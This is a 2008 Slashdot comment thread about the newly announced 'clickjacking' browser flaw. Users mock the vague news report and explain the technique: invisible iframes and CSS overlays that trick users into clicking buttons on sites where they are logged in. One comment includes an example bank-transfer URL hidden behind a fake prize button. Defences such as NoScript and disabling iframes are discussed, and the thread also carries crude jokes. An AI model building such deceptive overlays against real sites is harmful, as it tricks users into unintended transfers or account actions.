Alarm Raised For "Clickjacking" Browser Exploit

Shipment Date writes "ZDNet's Zero Day blog has some new information on what looks like a scary new browser exploit/threat affecting all the major desktop platforms — Microsoft Internet Explorer, Mozilla Firefox, Apple Safari, Opera and Adobe Flash. The threat, called Clickjacking, was to be discussed at the OWASP conference but was nixed at the last minute at hte request of affected vendors. From the article: 'In a nutshell, it's when you visit a malicious website and the attacker is able to take control of the links that your browser visits. The problem affects all of the different browsers except something like lynx. The issue has nothing to do with JavaScript so turning JavaScript off in your browser will not help you.'"

Hurray for us lynx users!

*crickets*

Re:Hurray for us lynx users!

I was wondering who used lynx. I guess it's the crickets.

Re:Hurray for us lynx users!

[PIBM]

Actually, I was using it yesterday ... I wish there was javascript support in lynx, I could not manage to login to gmail, even using the basic interface :(

Re:Hurray for us lynx users!

[saveth]

Hmm, I'm able to use lynx to log into Gmail. Granted, I had to accept a million cookies and other things along the way.

Lynx Version 2.8.6rel.4 (15 Nov 2006)
libwww-FM 2.14, SSL-MM 1.4.1, GNUTLS 1.6.2, ncurses 5.6.20080308(wide)
Built on linux-gnu May 2 2007 08:54:50

Re:Hurray for us lynx users!

[thetoadwarrior]

I often use it when I SSH into my home PC and I need to grab something to install on it or whatever. I use it as a rough guide for site usability too. Lynx still has it's place, imo.

Re:Hurray for us lynx users!

[Thaelon]

Hey I use lynx you insensitive clod!

The reason you can't "clickjack"* is cause it's a text based browser. There ain't no clicking!

*I didn't RTFA, so I don't know how appropriate this term is.

Re:Hurray for us lynx users!

[davester666]

Yes, if you use lynx, you get textjack'ed instead...

Re:Hurray for us lynx users!

[garaged]

I use links2 usually, not lynx, but still lynx is useful for a couple of things, like dumping headers easy/fast, and to download remotely from console :)

Re:Hurray for us lynx users!

[Adambomb]

Or Holdingdownholdingdownholdingdowncrapupupupenter-jacked.

Re:Hurray for us lynx users!

for a second i thought you said hypnotoad. All hail the hypnnotoad!

http://r33b.net/

Re:Hurray for us lynx users!

[steelersteve13]

no articles on wikipedia yet.

Re:Hurray for us lynx users!

[kelnos]

I didn't RTFA, so I don't know how appropriate this term is.

Don't worry, you didn't miss anything. The article basically says, "OMG WE ARE ALL SO PWNED!!111. But we're not going to tell you why."

Re:Hurray for us lynx users!

[memco]

Progressive enhancement FTW!

Re:Hurray for us lynx users!

[reezle]

Thanks, I read the article and wondered if it was just me.
Wonderful synopsis....

Re:Hurray for us lynx users!

[BenJaminus]

FTA

With this exploit, once you're on the malicious web page, the bad guy can make you click on any link

I think what they are hinting at is that if your browser automatically fills in forms for you, a malicious website could have a form and then automatically submit the data.

Re:Hurray for us lynx users!

[flosofl]

No, it's an IFRAME issue. A hidden IFRAME is created *under* the main page. Any click you make will also fall to the IFRAME under the main page. It appears JavaScript makes it easier but it's not necessary. I think this sounds like a DHTML problem (as in either the protocol or how it's rendered)

At least that's what I understand from the "how to stop this with NoScript" link in TFA. Basically if you turn off all IFRAMES in NoScript you can't get pwned.

Re:Hurray for us lynx users!

Lynx rox!!!

Re:Hurray for us lynx users!

[Deagol]

So nice to see another Plastic reader here on Slashdot.

Re:Hurray for us lynx users!

[LunarCrisis]

Those of us who browse with wget/less are safe too!

Re:Hurray for us lynx users!

[Mr.+Jaggers]

Umm. Or you could just use your mouse in links. I do.

http://links.sourceforge.net/docs/manual-0.82-en/links-usage-mouse.html

Go Lynx!

[ag3ntugly]

I knew there was a reason I liked lynx

Re:Go Lynx!

Besides speed, simplicity, clean interface and no freaking frills?

Re:Go Lynx!

Yes, that reason is that you haven't tried w3m or links yet.

Re:Go Lynx!

[ag3ntugly]

Actually, I use links quite a bit because, as I said in another post, when I click on links in Links, it works (at least in a a PuTTY window)

Re:Go Lynx!

[lysergic.acid]

i wouldn't exactly call the ability to render images "frills." i can understand if this were 1990 and the web was still mostly text-based. but the idea of a hypertext network and hypertext documents is to go beyond what normal text documents/interfaces could provide.

lynx has its merits, but calling all standard browsers too complicated or excessive is stretching it a bit. if lynx were just a basic browser that didn't have plugins, tabs, adblock, RSS readers, bookmarks, search tools, etc. then you could claim that other browsers have too many frills.

but lynx is a text-only browser. that's like saying a radio is a TV without the frills. stripping out core features does not make something have a cleaner interface or mean that the removed features are unnecessary.

Re:Go Lynx!

[Korin43]

Saying that images are a core feature of the web really depends on what you use it for. I can use Slashdot, check my mail, do google searches, check out Wikipedia.. all without any images.

Going back to your TV example, sometimes I'll turn on the news and go into another room where I can still hear it. Sure, the news is more entertaining when you can see the kitten that got rescued, but sometimes all you want is the text.

Re:Go Lynx!

[Adam+Hazzlebank]

You probably want something more modern like Links or w3m: www2u.biglobe.ne.jp/~hsaka/w3m/nec.png

Re:Go Lynx!

[hairyfeet]

For those on Win95-XP,or those that carry a thumbstick and would like a similar small,ultra fast browser that works great on a stick,might I suggest OffByOne? It is small(1.2Mb),very fast,easy to install to a stick or PC(just unzip),and as a nice bonus it also supports tabs. I have found this to be a great little addition to my thumbstick,and it really flies. But as always this is my 02c,YMMV

Re:Go Lynx!

[hairyfeet]

If you are wanting a tiny browser that does images,try OffByOne.It's a really great little browser,with full HTML 3.2 support. Of course some sites like Yahoo will complain that they can run all their scripts,but the links and images work just fine. And at 1.2Mb with a simple zip folder it is really easy to drop onto a thumbstick for quick browsing on the go. But as always this is my 02c,YMMV

Re:Go Lynx!

[lysergic.acid]

don't get me wrong, i think lynx is a great program. like i said earlier, it has its merits. but it's not a full-featured browser. and implying that it simply lacks the "frills" of standard browsers is ignoring a large part of the media and non-text components of the web.

if all browsers were text-only, imagine how limited the web would be. the web probably wouldn't have evolved to be as advanced or useful as it is today. you may as well just stick with a BBS or the Gopher protocol.

i think most people would find lynx very lacking if they tried to use it as primary browser. and that's not because its interface is cleaner or because it lacks frills.

Re:Go Lynx!

[e4g4]

But as always this is my 02c,YMMV

You say that so frequently that you may want to consider putting it into your signature.

Re:Go Lynx!

[tobiasly]

but lynx is a text-only browser. that's like saying a radio is a TV without the frills. stripping out core features does not make something have a cleaner interface or mean that the removed features are unnecessary.

Pffftt.. images may be "necessary" to you, but not all of us. Just this weekend I wrote a Perl script to render Flickr images in ASCII art. You can keep your fancy schmancy "images".

Re:Go Lynx!

Ahem. No everyone can actually see images. Lynx is quite popular among the visually handicapped (IE + Jaws is another popular choice). If your website follows standards, it should be accessible to the visually impaired.

Re:Go Lynx!

[Urkki]

Saying that images are a core feature of the web really depends on what you use it for.

I disagree. "Core feature" isn't defined by an individual user. Even if you don't need or use a feature, it may still be a core feature of the WWW. And the other way around, even if you use the web for tunneling other protocols over HTTP, that still doesn't make tunneling a core feature of the web, no matter how important it is to you.

I'd say that the core idea of the original web can be summarized as "hyperlinking documents that combine several forms of media". Lynx fails the "combine several forms of media" part (even if you can separately display the images with external viewer, that's more like separating several forms of media that were meant work together ;-).

"Web 2.0" then brings additional core ideas, basically dynamic interactivity, but that's another matter.

Re:Go Lynx!

[houghi]

That is why I I rather use w3m or links instead of lynx.

At least in those two some of the layout is kept. Lynx however is great in scripting.

Re:Go Lynx!

[Fred_A]

If you are wanting a tiny browser that does images,try OffByOne.It's a really great little browser,with full HTML 3.2 support.

And unlike Lynx, it has the advantage of only running in Windows. Yay. Down with those pesky portable programs !

Re:Go Lynx!

[skeeto]

i can understand if this were 1990 and the web was still mostly text-based.

Considering that the web didn't really exist until 1993, I would say it was based on nothing at that point. :-P

Re:Go Lynx!

[lysergic.acid]

hey, he created it in 1989, he just didn't release it until 1993!

i was just talking about the early alpha. =P

Re:Go Lynx!

[Mattsson]

There are lots of quite informative pictures on wikipedia too. =)

The first thing I thought of

was some weird mouse-mastubation scenario. *shudders*

Re:The first thing I thought of

[couchslug]

"The first thing I thought of was some weird mouse-mastubation scenario."

"Mastubation"?? I'm picturing small rodents with catheters....

Even my capybara Lemmiwinks thinks THAT is sick.

Re:The first thing I thought of

[secolactico]

was some weird mouse-mastubation scenario. *shudders*

"Mousturbation"? Ok, I'll shut up now.

Re:The first thing I thought of

[rubah]

well, we have nipples on laptops that act as mice, and the scrolling action on three-button mice is pretty analogous to *sniped*

Re:The first thing I thought of

Mousturbation: The act of repeatedly clicking on a non-responsive object to the point that when it eventually DOES respond, you feel like you've just had an orgasm.

Turn to Lynx?

[TheDarkMaster]

Well, they can't steals clicks from a browser without clicks

Re:Turn to Lynx?

[ag3ntugly]

Precisely, but I wonder if Links is vulnerable? It's text based just like lynx but when I use putty to ssh into my box at home, and run Links, I can click on links and buttons and it works.

Re:Turn to Lynx?

[AKAImBatman]

Precisely, but I wonder if Links is vulnerable?

Lynx and Links do not support IFrames, so they are not vulnerable. In fact, any browser not capable of advance CSS and/or IFrames is safe. Unfortunately, that's not very many browsers.

/me just checked email to find an official conversation going on about ClickJacking.

Re:Turn to Lynx?

[fataugie]

Great News!
My Mosaic 1.0 is safe!

Re:Turn to Lynx?

Precisely, but I wonder if Links is vulnerable?

Lynx and Links do not support IFrames, so they are not vulnerable. In fact, any browser not capable of advance CSS and/or IFrames is safe. Unfortunately, that's not very many browsers.

/me just checked email to find an official conversation going on about ClickJacking.

Have NoScript FF extension installed and set it to disable iframes.

Re:Turn to Lynx?

It's a reference to IRC - if you didn't catch that one suspects you are the younger here...

Re:Turn to Lynx?

I hate to burst you bubble, but it does not mean I'm 12. It means that I'm older than sin.

You young'uns these days just don't understand anything that has a black rope coming out the back. It's got to be all "txtm3 or gtfo". 4COL. Well, @TEOTD I have a message for you, young man! GOML* and GAL! --AKAIB

* Get Off My Lawn

Re:Turn to Lynx?

Opera has an option to disable iframes, if I'm not mistaken.

Re:Turn to Lynx?

[Mr2001]

That page gets /describe totally wrong, BTW. You can't forge emotes from other people. The command sends an emote to someone else, privately.

Re:Turn to Lynx?

You've never heard of IRC? Why do they give mod points to someone as tech-clueless as you?

Re:Turn to Lynx?

[jonadab]

You young whippersnappers these days think you know everything. Haven't you ever seen a MUD?

Information

[asCii88]

You call this "information"? It's not even clear what the exploit is about.

Re:Information

[eln]

It's very similar to the DNS issue from a couple of months back: It's a hugely scary thing that will doom the Internet, but because we're responsible we can't tell you what it is in any detail. However, if you don't patch your browser immediately (patch not yet available), you are fucked.

Have a nice day.

Re:Information

[AKAImBatman]

It's about using IFRAMES + CSS to make confusing visual elements that cause users to perform actions they didn't think they were performing. Feel better? ;-)

Re:Information

It's a hugely scary thing that will doom the Internet, but because we're responsible we can't tell you what it is in any detail. However, if you don't patch your browser immediately (patch not yet available), you are fucked.

Sounds like every corporate and republican (arguably the same thing) pitch I've heard since the fall of '01.

Boo! Be very afraid, but we will keep you safe.

(By stunning co-incidence, my catchpa is (wait for it): fleece)

Re:Information

[hesaigo999ca]

Autoclicker...no?

Re:Information

[Kaptainkid]

For additional support information. Click this link. LOL

Re:Information

[AaxelB]

And, suspicously, TFA itself is hidden behind a link! Do they really expect us to click it??

...I did click it. What a useless article.

It's a fundamental flaw with the way your browser works and cannot be fixed with a simple patch.

Oh no! There's nothing we can do!

In the meantime, the only fix is to disable browser scripting and plugins.

Uh... wha? I thought it didn't have to do with browser scripting and plugins?

So it's big and scary and you can't protect against it, except by taking basic precautions to protect yourself against it. I see.

Re:Information

[HikingStick]

You mean like the way the new Slashdot interface causes a lot of the comments to overlap, so you think you're clicking on that +3 Interesting one and you end up clicking a -1 Troll on the RNC veep candidate in a bikini...except much worse, I mean.

Re:Information

[OriginalArlen]

There's a big difference. The first public news of the Kaminsky DNS issue was with the release of Microsoft's Patch Tuesday DNS update, with simultaneous patches from ISC for BIND and the other affects nameservers. Dan organised all that with the help of CERT and the DNS server vendor/distributors, without leaks. Once the patches and a vague description was out, people put two and two together pretty quickly - IIRC from the BlackHat preso, the first correct solution Kaminsky received was within 48 hours - and shrewd guesses were being made within two weeks (followed by the unfortunate leak which broadly confirmed the guess.) It sounds like the cat is well and truly out of the bag here, already, and there are no patches yet. Apart from the people at the conference, there's enough detail in the sources the ZDNet blog links to to make it pretty clear which direction the shrewd guesses (and testing) will have started on.

Looking on the bright side, more browsers than nameservers auto-update themselves...

(Incidentally the reason the Internet wasn't destroyed by the Kaminsky bug was precisely because of all the prior coordination and then unequivocal "patch now" messages from multiple credible sources (CERT, Vixie, Microsoft, the other respected researchers Dan explained it to under NDA, etc.) And anyway you ARE still fucked in the long run, anyway, because DNS is still spoofable by a determined attacker (which probably means one who's going after a very high value target) in the absence of DNSSEC. Hence the (by Fed terms, frantic) haste with which the .gov root is being signed at last.

Have a great day!

Re:Information

[lysergic.acid]

i still don't get it. could you give an analogy involving cars?

Re:Information

[Hatta]

Sounds like our economy right about now.

Re:Information

[cmacb]

Researchers are beginning to raise an alarm for what looks like a scary new browser exploit/threat affecting all the major desktop platforms -- Microsoft Internet Explorer, Mozilla Firefox, Apple Safari, Opera and Adobe Flash.

Obviously the word "platform" is hot in media circles these days.

I noticed Linux isn't in there. Does that mean Linux is not a platform? If I run Firefox on Linux am I safe? If I run Firefox on OS X am I safe?

This is one reason I don't follow the news on ZDnet any more.

Re:Information

[AKAImBatman]

Sure. Imagine you're in a car showroom looking at a super-expensive car. It looks great and price is pretty good. So you tell the dealer you'll take the car. Except when you get in the car, you realize that someone had put a cardboard cutout in front of the car. The car you got in was actually an economy vehicle. Except now it's too late to undo your purchase!

Here's another one: Let's say you've got a bunch of buttons on your dash. Most of them control the radio, but one controls the ejection seat. While you're away, some neighbor kids from MIT think it's funny to come over and rewire the buttons on your radio. Now when you press the button to turn on your radio, you actually get ejected from the car. NOT FUNNY!

Better? :-P

Re:Information

[Spy+der+Mann]

How about this: Your name is Heather and you're trapped in Silent Hill. After beating the crap out of a monster, you realize that all the spooky playground was some CSS delusion and you ended up screwing innocent ppls' lives.

That would've been a pretty cool ending for SH3, btw, but I hope it helps explaining what this exploit really is about. So, in other words,
if you see a flash ad saying "click to win a prize", now you can know what the prize is ;-)

Re:Information

It's like a balloon, with too much air.

Re:Information

[collinstocks]

You call this "information"? It's not even clear what the exploit is about.

I agree entirely. What ever happened to "full disclosure"? Haven't most people concluded that it is a good idea, at this point?

Re:Information

[Mad+Merlin]

But here's the best part (from the article):

The issue has nothing to do with JavaScript so turning JavaScript off in your browser will not help you.

Ebay, for example, would be vulnerable to this since you could embed javascript into the web page, although, javascript is not required to exploit this.

In the meantime, the only fix is to disable browser scripting and plugins. We realize this doesnt give people much technical detail to go on, but its the best we can do right now.

So, the exploit has nothing to do with Javascript, but Javascript makes it easier, and the only way to protect yourself is to disable Javascript (and plugins). Wonderful!

Re:Information

[ahodgson]

Just give me a check for $700 billion, and I'll fix it for you. I know, I know, as recently as 2 months ago, I told you there was no problem. And if there is a problem, it's one caused by my friends and ex co-workers. Who, coincidentally, I will be giving your $700 billion to. But I'm the man to fix it. Really.

Re:Information

"You call this "information"? It's not even clear what the exploit is about." - by asCii88 (1017788) on Thursday September 25, @04:24PM (#25156725) Homepage

IFrames, &/or Plugins (specifically Adobe Flash is my guess here) are what you need to worry about... though, supposedly from what I have been reading? Turning off javascript does NOT hurt, & does actually help (despite the last line of the init. post here).

APK

P.S.=> I've been telling folks to 'crank those off', as well as javascript (if you do NOT absolutely NEED IT, for proper page functionality (such as on online banking &/or shopping sites)), here, for more than a year now:

HOW TO SECURE Windows 2000/XP/Server 2003 & even VISTA, plus, make it "fun-to-do", via CIS Tool Guidance (& beyond):

http://www.tcmagazine.com/forums/index.php?s=67b2240128d853305689dd2c383066e8&showtopic=2662&st=0&start=0#

apk

Re:Information

Full and responsible disclosure is better.

Re:Information

[Cousin+Scuzzy]

Better? :-P

Well, That's better than simply turning on the radio when you needed to eject.

Re:Information

[Repton]

So, you're saying that I go to a web page, click on some link, and the CSS or javascript rewrites it so that I'm actually redirected to some other link? That doesn't match the description in TFA -- the way it talks, all I have to do is visit a malicious website, and suddenly my browser is sending through clicks for anything they want me to click, and I don't have to do anything.

Re:Information

[Repton]

You mean this picture?

Re:Information

[howardd21]

Maybe I am crazy,but hat might be the funniest thing I have ever read on here.

Re:Information

HikingStick says: " ... and you end up clicking a -1 Troll on the RNC veep candidate in a bikini...except much worse ..."

You mean DNC veep Joe Biden in a bikini?

Re:Information

[RiotingPacifist]

but what can you actually do with this?
if i understand this correctly:
if you visit badsiteA it can force your browser to badsiteB
but as BadsiteA can already malware you up there is no point
Perhaps if it can be used across tabs then the old browsers (not IE8 / chrome) are vulnerable to changing banktab to badsitetab without you noticing

Re:Information

[enoz]

I would have classed that article as FUD, except that there are too many obvious contradictions.

Instead it just looks like some incoherent disinformation from someone who does not know the difference between a browser and a plugin.

a scary new browser exploit/threat affecting all the major desktop platforms - Microsoft Internet Explorer, Mozilla Firefox, Apple Safari, Opera and Adobe Flash.

That's where I stopped taking the article seriously. Unfortunately that was also the first paragraph.

Re:Information

[westyvw]

Slashdot has ads?

Re:Information

[felipekk]

Agreed 100%...

Re:Information

[MrZilla]

I saw people above mention iFrames, which probably means that you could put this into an ad service, have it serve your iFrame on GoodSiteA, thus forcing all clicks on that site to BadSiteB.

Re:Information

[cavebison]

It's about using IFRAMES + CSS to make confusing visual elements that cause users to perform actions they didn't think they were performing. Feel better? ;-)

Hey I might try that on my girlfriend!

Ah, who am I kidding.

Re:Information

The first public news about this issue was _AGES_ ago, Kaminski only pressed the Hypebutton loudly.

1995:

2004:

Re:Information

[jonadab]

Yeah, if you'd kept reading, you'd have noticed that they also said at least three times that it didn't require Javascript, and then went on to explain that it requires DHTML and can be done with "browser scripting" instead of Javascript.

Re:Information

[sholsinger]

Okay, so the exploit requires DHTML. But DHTML is javascript manipulating the elements on a page... So how exactly does it not require javascript?

From the Wikipedia entry:

Dynamic HTML, or DHTML, is a collection of technologies used together to create interactive and animated web sites by using a combination of a static markup language (such as HTML), a client-side scripting language (such as JavaScript), a presentation definition language (such as CSS), and the Document Object Model.

Okay, so really it could be any client-side scripting language. Aside from javascript what does that leave? Jscript? VBScript? Which browser supports those? Oooh, right IE.

Re:Information

[canajin56]

It doesn't have to do with browser scripting and plugins. But if you turn browser scripting and plugins off, whatever trojan/worm/virus they have on the site they are using this trick to link you to, won't infect you.

Re:Information

[Intron]

http://blogs.adobe.com/psirt/2008/09/thanks_to_jeremiah_grossman_an.html

I guess they fooled Adobe, tho.

Re:Information

[Apache]

For additional support information, click just about anywhere and our hidden iframe will take you there.

Re:Information

[Jon_S]

Yes, that is the first time I laughed out loud at work in 10+ years of reading /.

Re:Information

[Vlad_the_Inhaler]

I tried the Demo and it failed to do anything to my browser 'cos I don't have the Flash plugin installed.

Seamonkey 1.0.9 (not exactly the newest)
Suse 10.1 (not exactly the newest).

On my Windows XP machine at work, I upgraded to Firefox 3 a few months back. FF 2.x had not played Flash adverts (I avoided installing Flash there as well) but 3.0 does. This means FF 3.0 levels come with Flash enabled? It seems strange.

Re:Information

[mrdoogee]

That's what I'd like to know. Is this a problem just for Windows users? If so, that bad, but it really doesn't affect me since I use OS X at work and Linux at home. However, I would like to know if I should be ratcheting Noscript up a couple notches anyway.

Re:Information

[Intron]

http://kb.adobe.com/selfservice/viewContent.do?externalId=tn_15523 Flash can cover up form buttons, etc. The article suggests disabling all plugins, not Javascript.

Never gonna...

[null+etc.]

Oh great. Expect a resurgence in rickrolls. No one can protect you!

Re:Never gonna...

[Theoboley]

If that were the most of our worries here, It'd be hilarious! Sadly, all your computers are belong to this clickjacking....

Re:Never gonna...

[nine-times]

With all the horrible things on the Internet, you're worried about rickrolls? Have some priorities.

We're all going to end up seeing goatse.cx again.

Re:Never gonna...

[Joe+Snipe]

We're all going to end up seeing goatse.cx again.
yeah but now it will have Rick Astley playing in the background...

Re:Never gonna...

[Kvasio]

yeah but now it will have Rick Astley playing in the background...

Do you mean his music or that Rick will be on "giver.jpg" this time?

Re:Never gonna...

[uxr]

We're all going to end up seeing goatse.cx again.

So it's just going to redirect me to my homepage?

Re:Never gonna...

[BarryJacobsen]

We're all going to end up seeing goatse.cx again. yeah but now it will have Rick Astley playing with himself in the background...

Fixed :P

Re:Never gonna...

We're all going to end up seeing goatse.cx again.

yeah but now it will have Rick Astley playing in the background...

fap fap fap

Re:Never gonna...

Awesome idea! I'll get right on it!

Re:Never gonna...

Man.. I can see it now, that bad, bad music with a bouncing gaping a-hole in beat with the music.. It's now in my nightmares, thanks slashdot.

FF 3.0.2 safe?

[DavidR1991]

Fairly certain this is one of the listed fixes for 3.0.2, but I could be wrong (Or is this _another_ kind of clickjacking flaw?)

Re:FF 3.0.2 safe?

Sounds like this one:
http://www.mozilla.org/security/announce/2008/mfsa2008-40.html

Re:FF 3.0.2 safe?

[erroneus]

That's not it because the description says that disabling Javascript will not help. The bug indicated by you says disabling Javascript will help.

Clickjacking?

Isn't that what happens *after* you visit a pr0n site?

Re:Clickjacking?

(Score: -1, *Yawn*)

Summary wrong

[mazarin5]

The issue has nothing to do with JavaScript so turning JavaScript off in your browser will not help you.'

The quote from the article says you can protect yourself by disabling scripting:

In the meantime, the only fix is to disable browser scripting and plugins. We realize this doesnâ(TM)t give people much technical detail to go on, but itâ(TM)s the best we can do right now.

Re:Summary wrong

[Free+the+Cowards]

The first quote is also from the article, so it's not the summary's fault. The article is vague and self-contradictory, so I'm calling bullshit until and unless further details are given.

Re:Summary wrong

[Aphoxema]

Probably just some asshole trying to make some word popular so later when the people they're trying to impress say it in conversation, they can go "Yeah?! Clickjacking! Did you know I came up with that word!?"

Re:Summary wrong

[jesser]

The zdnet article is pretty vague, but I think it refers to the problem detailed in this message from Michal Zalewski:

"A malicious page in domain A may create an IFRAME pointing to an application in domain B, to which the user is currently authenticated with cookies. The top-level page may then cover portions of the IFRAME with other visual elements to seamlessly hide everything but a single UI button in domain B, such as 'delete all items', 'click to add Bob as a friend', etc. It may then provide own, misleading UI that implies that the button serves a different purpose and is a part of site A, inviting the user to click it."

Disabling JavaScript won't prevent the attack. It will break some mitigations, though!

Re:Summary wrong

[kesuki]

the problem is actually in dhtml, but javascript makes the exploit 'much easier'

hence, the attack sites will all be using javascript, because it's easier than writing it entirely in dhtml just to score and extra 1 click from the guy who disabled javascript because he doesn't trust it.

BTW: in theory even sites like slashdot can be infected because the attack applies to all CSS coded sites. nice.

oh, BTW, is you have noscript installed, this vulnerability can only force clicks within the same domain, since cross site code is automatically disabled.. AFAIK the only way to disable CSS is to use obsolete browses like lynx.

Re:Summary wrong

[Free+the+Cowards]

I thought "DHTML" was just a term for manipulating the DOM on the fly using JavaScript. How do you do DHTML without JavaScript?

Re:Summary wrong

.... so I'm calling bullshit....

I'm calling shenanigans!

Re:Summary wrong

[jesser]

FWIW, this isn't exactly a new idea. roc and I discussed it back in 2002.

I'm glad it's getting attention now, though. Any fix is likely to require changes to specs.

Re:Summary wrong

Well CSS has events as well

Re:Summary wrong

[sootman]

+1 for "vague and self-contradictory."

From TFA: "The issue has nothing to do with JavaScript so turning JavaScript off in your browser will not help you." and then "The exploit requires DHTML." As far as I know, DHTML requires a client-side scripting language--the most popular of which (only?) is JavaScript.

Re:Summary wrong

[HTH+NE1]

Try the CSS pseudoclass :active to move things around, like make a facade image positioned to cover a real button disappear with display: none;.

Re:Summary wrong

[hvm2hvm]

If that's the case, then all you have to do is look at the address bar and see if you really are on the site you are seeing. If you click on a link and find yourself looking at your page on a social network while the address says "spam.dyndns.com" you should realize something is wrong.

Re:Summary wrong

[Free+the+Cowards]

Makes sense, thank you for explaining that.

Re:Summary wrong

[HTH+NE1]

Try the CSS pseudoclass :active

And here is an example.

Re:Summary wrong

[HTH+NE1]

I've wanted to know when an iframe is embedded in my page and where it comes from so I can evaluate whether I can trust it, especially since my credit card company's website decided to embed the login form inside such an iframe. Further, if I attempt to Show Only This Frame on the iframe, the site redirects me to an error page.

Putting iframe[src]:before { content: attr(src); } in my userContent.css has not worked, though a[name]:before { content: "[#] "; } a[name]:active:before { content: "[#" attr(name) "] "; } does work to advertise named anchors (except where idiot web designers wrap link text in a named anchor causing it to shift away when clicked).

Re:Summary wrong

[kesuki]

and what do you do when it's a highly page ranked, 'google' shopping store, that is actually a phishing site on a 'build a estore site' that transfers your data to a legitimate store and simultaneously harvests your cc data to sell on the black market?

hrm smarty pants what do you do then. happened to me, buying a cell phone data cable on the internet instead of in store where they charge triple the value of a data transfer cable...

those 'build a estore' sites all look like legit domains... and on the surface google shopping can't tell the difference between a 'real' store and a 'phishing' store... and hackers know how to page rank spam, with free porn sites.

Re:Summary wrong

[brunascle]

But by that time, the damage is done. Suppose the link you clicked was a "Delete my account" button, for example. Also, the parent window should still be covering most of the iframe, so the only part of the site you'd see is the small box where the link was.

Re:Summary wrong

[Kompressor]

So then what if someone combines it with one of the phishing tactics that present "western" characters from an Asian character set in the address bar?

The address bar will still read correctly, but the values of the letters you see would be completely different from where you actually were.

Or am I way off base?

Re:Summary wrong

[Free+the+Cowards]

What you do is you see an unknown charge on your credit card, call the company, cancel the card, and get a new one. Total cost to you: 15 minutes and zero dollars.

Honestly, why are people so afraid of having their credit card numbers stolen? Unless you're utterly negligent and don't report fraudulent purchases, you have no liability!

Re:Summary wrong

[anotherone]

Actually under certain circumstances you could be liable for up to $50, but yeah usually it's not a big deal.

Re:Summary wrong

[kesuki]

actually, i have capital one, so when a charge for $1.43 cents showed up they called me. but, it seemed like a valid little estore, i got my merchandise, they e-mailed me a tracking number.. nothing suspicious except that my card then was sold on the black market.

and remember, there are a lot of people who use debit cards, debit cards directly charge a bank account, and you don't have protection. some people chose not to get credit cards, or simply can't get credit cards.

even if i'm not liable for the fraud, there is still someone making money off my stolen credit card, and everyone who get credit cards stolen costs the global economy billions of dollars a year.

and imagine, if they had designed a site to steal my whole identity and not just my credit card... i would have been suspicious, because i've used online stores before... but how many people would stupidly enter their social security number at an online store if it asked for it and required it?

Re:Summary wrong

AFAIK the only way to disable CSS is to use obsolete browses like lynx.

I'm usually using control + shift + s with the firefox developer toolbar extension.

Re:Summary wrong

[Free+the+Cowards]

I'm pretty sure that's only if your actual signature is on a receipt somewhere, which is fairly difficult to arrange when your number gets stolen over the internet.

Re:Summary wrong

[Free+the+Cowards]

Having your number "sold on the black market" is irrelevant. Either your number was used fraudulently or it wasn't. If it was, you get it replaced. If it wasn't, nothing bad happened.

I'm pretty sure that you have the same protections on debit cards as on credit cards. It's more difficult because the money in your bank account goes away, but you do get it back on fraudulent charges.

However, it's bad to have the money leave in the first place and it moves power from me to the card company, so this is why I never use debit cards.

Stolen cards may cost the global economy but that's hardly a reason for me to get deeply upset when mine get stolen. The card companies generally have good anti-fraud measures and when they don't my personal cost is very low. It's reasonable to take basic safeguards against having the number stolen but there's no reason to get upset about the possibility.

Re:Summary wrong

[bluej100]

The point is that you aren't seeing the trusted site, aside from one input element. It sounds like the attack is basically opening an iframe to "http://mybank.example/transfer?to=haxors&amount=99999" and covering everything other than the "Confirm" button with "Click okay to win a FREE XBox 360!"

If I'm predicting the attack correctly, effective protection is either 1) using different browsers for trusted and untrusted sites or 2) only being logged into one site at a time. (Key phrase: to which the user is currently authenticated with cookies.)

I suppose, though, that as an extension of this attack, they could perhaps present the login form for another site as a registration form and hope to catch people using the same credentials for everything.

Re:Summary wrong

[geekmux]

In the meantime, the only fix is to disable browser scripting and plugins...

Wow, is that all? Whew, that's a relief. For a minute there I thought you were going to tell me I had to cripple functionality for 90% of Internet sites or something craz...er, aaahhh...oh.Nevermind.

Re:Summary wrong

[Pulzar]

and remember, there are a lot of people who use debit cards, debit cards directly charge a bank account, and you don't have protection.

What bank are you with? My debit card was somehow duplicated (since I never lost mine, it was still in my wallet) and used to withdraw money in another city, far away from me. My bank canceled my debit card, gave me a new one, and gave me the money back. It was pretty much the same experience as when my credit card number was stolen.

Re:Summary wrong

[brasscount]

Amen. Unsecure coding practices from banks (credit card providers, etc.) are the leading issue in browser security, IMO. If a security fix (like disable displaying different domains in multiple frames) breaks banking, then the setting gets turned off. Its part of FISMA and FDCC but no one can actually implement it, because too many app developers want to let you look at a couple of different sites at one time, rather than screen scraping and redisplaying to save on overhead.

Re:Summary wrong

[bbdd]

A follow-up from Giorgio Maone, the creator of NoScript says:

"1. It's really scary.

2. NoScript in its default configuration can defeat most of the possible attack scenarios (i.e. the most practical, effective and dangerous) - see this comment by Jeremiah Grossman himself.

3. For 100% protection by NoScript, you need to check the "Plugins | Forbid " option."

Read it here:

http://blogs.zdnet.com/security/?p=1973

Re:Summary wrong

Yet another reason to know who you are giving your credit card number to. Finding a store via a Google search, doing no other investigation of that store (i.e. determining whether the people working there are trustworthy, whether you have the right internet address, etc.), and handing your credit card number over to them is just asking for trouble.

Re:Summary wrong

It does not work if java script is disabled. I do not use the latest flash player, but with disabled java script it did not even try to load swflash.cab or test.swf, or if it did download it never activated.

Re:Summary wrong

[ConceptJunkie]

Why `Free as in Beer'? Because TANSTAAFL.

What if you make a lunch out of free beer?

Re:Summary wrong

Or use Firefox Web Developer Toolbar - Ctrl+Shift+L disables all CSS.

Re:Summary wrong

[White+Shade]

That's true, but the big problem is that the debit card money comes out of your account immediately.... even if you do get it all back, there is the possibility for this to happen:

1- you check your bank balance in the morning
2- you make a string of purchases, knowing that you're safe in your balance

hidden step 1.5 - someone illegitimately uses your bank card and zeros you out.
hidden step 3 - every purchase you made hits you for a $20-40 overdraft charge, which you may or may not get back, and even if you do get it back, it takes a finite amount of time, during which every other transaction that may not have posted yet ALSO hits you for overdraft, and you can't use your card, and have no money.

It's a really awkward and annoying situation to be in, for sure.

Re:Summary wrong

[kesuki]

slashcode ate your [iframe] paste because it used '>' carrots.

iframe is not blocked by default. so noscript does not block this by default if a determined hacker is targeting noscript users.

Re:Summary wrong

[Tangent128]

Some are suggesting to simply disable UI interaction with an iframe while it's covered; half a second after the iframe is clear, it can be clicked again. And same-origin frames will probably not be so limited, so you should be fine.

Re:Summary wrong

[Pulzar]

